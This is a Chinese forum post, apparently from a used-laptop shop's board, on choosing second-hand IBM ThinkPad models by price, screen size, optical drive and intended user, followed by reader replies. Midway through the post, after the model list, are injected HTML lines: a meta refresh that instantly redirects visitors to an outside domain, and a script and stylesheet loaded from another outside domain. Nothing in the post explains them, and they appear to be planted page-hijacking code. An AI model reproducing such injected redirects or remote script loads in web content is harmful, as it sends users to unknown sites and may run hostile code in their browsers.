开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

如何选择二手IBM

关闭 [复制链接]
买二手本本是买性价比。诚然,二手本本是用过的,不是全新的,但非质量差的代名词。很多二手本本都是别人淘汰的。试想,如果我要把自己几年前使用的本本卖了,我把他弄坏了再卖人,那我不是傻冒吗?那还会有谁要?如果有人要,那他不就是傻冒吗?世界上傻冒没这么多,所以,二手本本仍然是我们这些追求时尚,手头拮据青年的最佳选择。
好吧,我们今天的话提就从二手IBM笔记本说起。IBM的口碑大家都知道的,其他的笔记本我就不说了,IBM是经典,耐用的象征。争对大家对IBM的型号不是很了解,我先给大家介绍一下型号吧,本人也不是很懂行,只是把自己把知道的东西说给大家听,分享经验,非常欢迎大家和我探讨交流。
据我所知道的,有IBM i570,240,240X,240Z,390X,A21E,I SERIES,570,570E,I30,A22E,A20M,A21M,A22M,T20,T21,T22,T23,R30,R31,X20,X21,X22,X23,X24。。。我所知道的二手的基本上就这些了,其他的像T30,T40二手的较少。
首先,介绍一下这些笔记本的价格,屏幕,有无光驱等特征。
1。按大概价格分
1000-1500档:I570,240,240X,390X,570 ,I SERIES。。。
1500-2000档:240Z,A21E,570E,I30,A22E,A20M。。。
2000-2500档:A21M,A22M,T20,T21,X20,X21。。。
2500-3000档:T22,R30,R31,X22,X23。。。
3000以上档: T23.X24,T30,T40。。。
2。按屏幕大小分
10。3寸:240,240X,240Z。。。
12。1寸:390X,X20,X21,X22,X23,X24。。。
13。3寸:I570,390X,570,570E,I SERIES,I30。。。
14。1寸及以上:A21E,A20M,A21M,A22M,A22E,T20,T21,T22,T23,R30,R31。。。
3。按有无光驱分(也可以说成是按重量分)
有(重量重):390X,A21E,I SERIES,I30,A22E,A20M,A21M,A22M,T20,T21,T22,T23,R30,R31
无(重量轻):I570,240,240X,240Z,570,570E,X20,X21,X22,X23,X24
其次,按适用人群种类分,不同的工作需要不同功能的笔记本,比如说经常出差的那就需要重量轻的,只要学习功能的那用配置低实惠的笔记本就可以,等等。。。
1。经济实惠学习型
570,240,240X,I SERIES,I570,390X。。。
2。一般技术处理型
240Z,A21E,A20M,A21M,T20,X20。。。
3。看电影上网聊型
A22E,A22M,I30,T21,T22,T23,R30,R31,X21,X22,X23,X24。。。
4。MM专用轻便型
240,240X,240Z,X20,X21,X22,X23,X24。。。<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

怎么没有43,好像43很多吧
LZ的价格也高了些吧。。。
现在市场上 T42  T43 T60的货也比以前要多了
俺还真想想买台二手的T43做收藏,最便宜多少米能拿下啊?
二手的T43
43挺贵的....穷学生啊,受不了,虽然很想买个二手的来玩玩linux
呵呵  楼主很强啊   
lz说的挺好的  二手不时候对性能有要求的
二手怕买到不好的啊。
原帖由 beyond456 于 2007-9-25 10:18 发表
二手怕买到不好的啊。

不知能用多久呢
买二手的 还不如加点钱买个水货   
还是新的    保修也方便  
现在买二手装XP     你不换硬盘不加内存是不行的
水的一手那么便宜,干吗买2手?